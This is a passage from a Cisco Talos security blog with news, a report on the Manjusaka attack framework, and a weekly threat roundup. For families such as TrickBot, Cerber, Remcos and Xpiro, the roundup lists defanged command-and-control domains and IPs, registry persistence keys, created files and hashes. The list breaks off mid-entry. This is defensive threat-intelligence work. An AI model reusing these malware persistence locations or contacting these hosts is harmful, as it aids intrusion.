If you want more in-depth talks, we’ll have five sponsored sessions between the 10th and 11th. If you want the latest schedule and location on those talks, be sure to follow us on Twitter or check out Cisco’s BlackHat event page here. Our sponsored talks cover Talos’ latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. 

And if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. 

For anyone sticking around for DEF CON, we’ll also have a presence there with Blue Team Village. Drop any questions in the Blue Team Village Discord for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 – 11 p.m. local time. 

To stay up to date on all things Talos at both conferences, be sure to follow us on social media.  -
  

The one big thing 


Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild that could be the next evolution of Cobalt Strike — and is even advertised as so. This framework is advertised as an imitation of the Cobalt Strike framework. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. 

Why do I care? 

Our researchers discovered a fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, that’s freely available and can generate new implants with custom configurations with ease. This increases the likelihood of wider adoption of this framework by malicious actors. If you’re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used out there, it’s safe to assume any evolution of it is going to draw some interest.  

So now what? 

Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka. 

 

Other news of note


Everything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country this week. She was the U.S.’ highest-ranking official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi’s actions and launched several kinetic warfare exercises. (Reuters, Washington Post

The U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch for the issue under CISA’s new guidance. (Dark Reading, Bleeping Computer

North Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to its arsenal. The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users’ Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country’s weapons program. (Ars Technica, Bloomberg


Can’t get enough Talos? 


Upcoming events where you can find Talos 


BlackHat U.S.A 2022 (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

USENIX Security '22 (Aug. 10 - 12, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

MD5: 9066dff68c1d66a6d5f9f2904359876c  
Typical Filename: dota-15_id3622928ids1s.exe  
Claimed Product: N/A  
Detection Name: W32.F21B040F7C.in12.Talos  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 311d64e4892f75019ee257b8377c723e  
Typical Filename: ultrasurf-21-32.exe  
Claimed Product: N/A    
Detection Name: W32.DFC.MalParent 

New SDR feature released for Cisco Secure Email

5 August 2022 at 14:59

Cisco Talos today announced the release of a new mechanism that allows Cisco Secure Email customers the option to submit Sender Domain Reputation (SDR) disputes through TalosIntelligence.com.

Customers now have the option of receiving self-service support through TalosIntelligence.com or may continue engaging with TAC. This new feature improves efficiency for Secure Email customers by streamlining the SDR dispute ticket process.

Users can submit email sender domains and email addresses for investigation if they believe a domain or address should be marked as malicious or has been wrongfully marked as malicious. Please provide as much data as possible to assist our investigation team.

Threat Roundup for July 29 to August 5

5 August 2022 at 19:54

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 29 and Aug. 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.TrickBot-9958804-0 Dropper TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Ransomware.Cerber-9958814-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Virus.Xpiro-9958895-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Remcos-9960040-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Dropper.Shiz-9958984-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.
Win.Dropper.HawkEye-9959777-0 Dropper HawkEye is an information-stealing malware that targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media.
Win.Worm.Kuluoz-9959792-0 Worm Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.DarkComet-9959797-1 Dropper DarkComet and related variants are a family of remote access trojans that provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Dropper.Ramnit-9960101-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It can also steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.TrickBot-9958804-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 46 samples
Mutexes Occurrences
5502606391408671395 4
32899542343072484998 4
1124524871971925691 3
24112587554236391103 3
39744624822682236206 3
23819686304274202058 2
31572222973474305701 2
38648211142506533958 1
33656147683147949452 1
7918010151544240523 1
38748932962513239244 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wequinc[.]pl 4
patardd[.]pl 4
rydedun[.]pl 3
boristh[.]pl 3
lionopp[.]pl 3
matesic[.]pl 2
zanouns[.]pl 2
beryofn[.]pl 1
cabolth[.]pl 1
risiert[.]pl 1
githyet[.]pl 1

File Hashes

01a4f86457a252ffc23117ba653a2093902d0160140a3fda03e3cb9595f6d652 04a8a18b801bf158717c49444c3148f56fb1c23b6781b589106b848fad13557f 04d4ecf05a7bcc6ca0f318bacaa6087ea1e5badc14ca9eebec52aaff791718bc 08a004e94ce71ee0d239e38242283544f530996f4785924f85616040b278bef4 094f5c76889cd9f3f9357d72eda49a962eedc8457a77d586459dbd5968f85aef 0c25f673e25e8c9bb066ae56c41a83e28ef40a9da8327c9f7cd09f663b9a4614 0ef6c2cc035d61abd0f221d2bb8d6c0f5fc1e2e87cd5001f47861435fded326b 12eb4eb5dd38c776ec50166596c5e4ffda47108ce709990ae84a33a3a91776ed 1f14d617fd53588a36cd26c19e6f306fad28bac24140e9083986bb0cac607bc5 2184130eb8a891000fee1e343a5634531d72e05a7893fbafd6d53e52350bae19 23d19c57bacf51421505125da6917c815a1aa0d5c7346cf42c47f6667df0599d 2549d2a70d146340d14d981ecd9c33ce384bc743d4ed258f1eb9740c30792429 26851fc35426f83e70d1542cc4f00a3dd16222de418d2e0727a4ab9d5218c22b 28d1f82ea2f237ae643e442adae17449dadb8ad93397bf2299b0b53abeee45cb 2d05858c463ea267870ff964d9f9779def1ca711586dcfea58745ebe6675ff1f 2d1e5cc0f414d6cc94ec251605c68c32c442740e129d7af97f8293844aecca6a 30636b11d051121251b2051971223e6e294dfaf917338239deb5b8edf5bce20b 39d4446bb6b1c8cbf319fe02f1316897f22a6b00633af1b7e6159dbd7b837556 3a0c89d07193ae260ced7a04873117af0213c43407248d2ff7edf95bd3b32421 3b5e722ae23b3656cfb17fcb9fd218b92c5e4f24c241c3f1c37bded99d92c035 3f32a6229d93292633dc3c9af4dcf7360463cd9fcc72bfc68bfc68afa666316d 4f47c12806778d27afa43905ebb5b2079a451da93237899167d6420333cfe9a8 50543f06717e0d022a4b58043861f0a38ab82e068f07414adc5be142a66c6cec 513125bc77c78f24fc6a29a125c0d5373d5b365f476ba496f90d8dc952fd4441 5584279c960a9a7aeb97ececdb90adc01da3dab0f1fe1cbf8c10e67f14d19c0d
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9958814-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
16
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 16
<HKCU>\PRINTERS\DEFAULTS 16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_01
16
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_00
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: fc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ntoskrnl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ntoskrnl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: grpconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: grpconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: hh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WerFaultSecure
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: WerFaultSecure
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: javaws
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: javaws
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Dism
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Dism
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: sc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: expand
1
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
85[.]93[.]0[.]4 16
85[.]93[.]0[.]118 16
85[.]93[.]0[.]2/31 16
85[.]93[.]0[.]92/30 16
85[.]93[.]0[.]96/28 16
85[.]93[.]0[.]112/30 16
85[.]93[.]0[.]116/31 16
85[.]93[.]3[.]224/27 16
85[.]93[.]4[.]0/25 16
85[.]93[.]4[.]128/26 16
85[.]93[.]4[.]192/27 16
85[.]93[.]4[.]224/29 16
85[.]93[.]4[.]232/30 16
85[.]93[.]4[.]236/31 16
85[.]93[.]39[.]8/29 16
85[.]93[.]39[.]16/28 16
85[.]93[.]39[.]32/27 16
85[.]93[.]39[.]64/26 16
85[.]93[.]39[.]128/25 16
85[.]93[.]40[.]0/21 16
85[.]93[.]48[.]0/24 16
85[.]93[.]49[.]0/25 16
85[.]93[.]49[.]128/28 16
85[.]93[.]49[.]144/31 16
Files and or directories created Occurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2} 16
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\fc.lnk 2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\fc.exe 2
%System32%\Tasks\fc 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ntoskrnl.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ntoskrnl.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\WerFaultSecure.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\WerFaultSecure.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ndadmin.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ndadmin.exe 1
%System32%\Tasks\ndadmin 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\grpconv.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\grpconv.exe 1
%System32%\Tasks\grpconv 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\sdchange.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\sdchange.exe 1
%System32%\Tasks\sdchange 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\at.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\at.exe 1
%System32%\Tasks\at 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\hh.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\hh.exe 1
%System32%\Tasks\hh 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\javaws.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\javaws.exe 1
*See JSON for more IOCs

File Hashes

13cb0416ecaedac2d05c117c68d7745d2f2ef8d2e41a5522ae28a9fdbe1cc464 18e9f9e0f0584b662165a2c78ca155ec06b59f48bfb09655929aaf6e4d3e04b6 273e649cfa2dba65d23094955a8901b2d8bcabd9d883eb53db97da09b2dc7257 37ce9b3d448b8d7ced3c71deebe8a826aa27095d155bbb08f5fe945edcaa665d 396c12c17e7de26873a87c37724b30ebeee8a246cb9f4dd8c81c4eb28e5a36ec 62e12d7f62c7c9826d8b20334d6bf5a9b9367cc92735c4c0ee0b9b04c68ebb30 636bb6784c21658f113ea4dcc00a82f0aa2c1e68927f3bb398d57ab5fcb6bc53 7017f1de73c8949efa7b04eb9973d73b712af738d2faf268cf32be7dea92b136 73fd26b7ee1d7939a55ee17a0ea15fc4a3aa85d417f9d19ec33230e71d21ac11 80574eb815087be8ead2c679474b8cf100a5a4db41cd3e012eff0c3e50ed900a 910aad5d8e14a47c2882531c587ceb7836af31e2c09296c43877a3ed2cc044e6 a340be1e9fe2140662c6bb04f1280eb91b1b1b1bd76c8e484ab4058ff25d5cf3 c41250c29a915060c509cb390c8dac68029067c1537707742ed211866ae2bff4 caba5cbc3931965b5f478934e02d20775413e15bcc559a684c632cfa9b151583 f6c4639bcabd34e8b2e9cf8323e07416a11bc4d579b910405880a8950128cfb1 fc73adec96749e88de8fb29777f1b4c27439c24690236857576076f545c8deb5

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Virus.Xpiro-9958895-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 37 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
37
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
37
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
37
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
37
Mutexes Occurrences
kkq-vx_mtx61 37
kkq-vx_mtx62 37
kkq-vx_mtx63 37
kkq-vx_mtx64 37
kkq-vx_mtx65 37
kkq-vx_mtx66 37
kkq-vx_mtx67 37
kkq-vx_mtx68 37
kkq-vx_mtx69 37
kkq-vx_mtx70 37
kkq-vx_mtx71 37
kkq-vx_mtx72 37
kkq-vx_mtx73 37
kkq-vx_mtx74 37
kkq-vx_mtx75 37
kkq-vx_mtx76 37
kkq-vx_mtx77 37
kkq-vx_mtx78 37
kkq-vx_mtx79 37
kkq-vx_mtx80 37
kkq-vx_mtx81 37
kkq-vx_mtx82 37
kkq-vx_mtx83 37
kkq-vx_mtx84 37
kkq-vx_mtx85 37
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 37
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 37
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 37
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 37
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 37
%System32%\FXSSVC.exe 37
%System32%\UI0Detect.exe 37
%System32%\alg.exe 37
%System32%\dllhost.exe 37
%System32%\ieetwcollector.exe 37
%System32%\msdtc.exe 37
%System32%\msiexec.exe 37
%System32%\snmptrap.exe 37
%System32%\sppsvc.exe 37
%System32%\vds.exe 37
%SystemRoot%\ehome\ehrecvr.exe 37
%SystemRoot%\ehome\ehsched.exe 37
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 37
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 37
%SystemRoot%\SysWOW64\dllhost.exe 37
%SystemRoot%\SysWOW64\msiexec.exe 37
%SystemRoot%\SysWOW64\svchost.exe 37
*See JSON for more IOCs

File Hashes

013aa31a250e2858846c6f078e12a5132abbc0fad271365d3b67527fa2c2f402 05c2e245c5f3a325472cf34f42093931e48d181c0f17caf9add2b35e7a3e828c 0aee33737e3213c74bb671a1ab7b9485e00ade57ade144e2be354f67506a7290 0af8855eff016554c3ddf0ce82bb61859ac3986ee4136ee06e7fe5d5a6d89788 0ca2f5ca6ce21bacf1b26601c214a36766a0c911320bec0c184b5a18923ece23 128d57cca2eae54f5754a5f1730a05df82d942a11764d0595e6c920498e9565f 1397eff74a13595ea3fcb206a76977d1447997680fdf81163c2b985a009b080c 13dd82a41add2789b1ea617cded11cf9bdbc143082372dcc2b26b2ae2616dbba 14e5e9016d589d815058b09845af3b2fc2781b9815a493499664f29e9832e9fa 16fcdd9f0950eda4799c80afd354767feefb725c58d82022c2d1385e25d48e96 1b0665bd149dd3b9ae9a3b19c7be06b5ddcd53da461f91cda65365b94b7a288b 1cf200ce049a09ea6f18ff56f65c651d519d6096d6eaf94331351c1217d2e002 1f98e6f12d028379751c4e5f6efe96e0fe8a286c7448513dda93c980e3d8acf6 26bd53dc56ec5c20627d67c8bdce2f67c3325bd6421a87319e3694abcf73867e 28664a444ff8d844816b801fcf92199100cad7375ebaedea96020b2f7e2c664b 290be865ff04b744f3f34e17cded589f11519cb10d5d186535cd5a21de8dd650 29e70dc26eb00d9ff16ed8864b2583dde97e70d6f7dc074c50f3665ad7f8b2dc 2c52d85ad0e41acf5112bccbbdde281950692c0e100e499a15b170d66d0154d0 30ed57cfe6626a3e05de88be3207d4524311c62a6a2b5647f9359a620ed22f11 3134096945a4cea5132ea9d0ad9b1a6925da40d2d4e86c8f8c8f4d3795b962ca 35f44b47ad1e072f2030291462cedd654234eb0575883ae8f8d5978c051d78e1 35fcd428c89e9586460cb2701ca4cb378824a32d497366a96fa234caf54d8048 3c8477fdcd2719855d6b38cf29849d36dca6bf90805f996286bf77fff7ba1fa3 3eb5cdb190ee1efbea012512c3ed6afd6215473bf208a1853f37701a3f7ba13a 3f53b25ccced470ef2b1eb2edb4b839099a0ca597f4dbcc3aa590b260d727ab0
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9960040-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
7
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: FaviconPath
2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: Deleted
2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
Value Name: DefaultScope
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} 2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS
Value Name: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
2
<HKCU>\SOFTWARE\REMCOS-SFLVDU
Value Name: licence
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: mea
1
<HKCU>\SOFTWARE\REMCOS-SFLVDU 1
<HKCU>\SOFTWARE\REMCOS-SFLVDU
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-1MSE40 1
<HKCU>\SOFTWARE\REMCOS-1MSE40
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-1MSE40
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Un9
1
<HKCU>\SOFTWARE\REMCOS-A21G8J 1
<HKCU>\SOFTWARE\REMCOS-A21G8J
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-A21G8J
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: re
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: dr
1
Mutexes Occurrences
Remcos_Mutex_Inj 3
Local\55C37268-60E9-964A-3299-E2046F3CC613 2
Remcos-SFLVDU 1
Remcos-1MSE40 1
Remcos-A21G8J 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]225[.]214[.]71 4
13[.]225[.]214[.]108 4
37[.]19[.]193[.]217 3
95[.]211[.]75[.]16 2
162[.]210[.]195[.]111 1
13[.]225[.]214[.]91 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
piloresi[.]top 7
dioneras[.]top 7
downloadmirror[.]intel[.]com 5
uniresio[.]top 4
emperimen[.]com 3
www[.]bing[.]com 2
busyboydesign[.]xyz 2
toptoptop2[.]site 1
toptoptop3[.]site 1
toptoptop3[.]online 1
toptoptop2[.]online 1
lutheatre[.]com 1
fallium[.]com 1
sheaffic[.]com 1
Files and or directories created Occurrences
%SystemRoot%\win.ini 21
%LOCALAPPDATA%\Administrator 8
%HOMEPATH%\kmm 1
%HOMEPATH%\kmm\Cam.exe 1
%HOMEPATH%\kmm\Cam.vbs 1
%HOMEPATH%\Dul\Slu6.exe 1
%HOMEPATH%\Dul\Slu6.vbs 1
%HOMEPATH%\Dul 1
%HOMEPATH%\Uds 1
%HOMEPATH%\Uds\sov.exe 1
%HOMEPATH%\Uds\sov.vbs 1
%HOMEPATH%\Sv9 1
%HOMEPATH%\Sv9\BUT.exe 1
%HOMEPATH%\Sv9\BUT.vbs 1
%HOMEPATH%\ref 1
